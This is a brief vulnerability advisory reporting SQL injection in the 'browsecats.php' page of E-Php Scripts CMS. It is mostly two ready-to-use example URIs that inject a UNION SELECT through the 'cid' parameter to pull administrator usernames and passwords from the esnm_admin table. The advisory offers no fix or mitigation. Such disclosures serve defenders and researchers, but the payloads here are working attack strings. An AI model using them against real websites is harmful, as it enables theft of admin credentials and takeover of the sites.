E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability

E-Php Scripts CMS 'browsecats.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin

http://target/cms/browsecats.php?cid=-12%20union%20select%200,concat%28es_username,0x3a,es_password%29,2,3%20%20from%20esnm_admin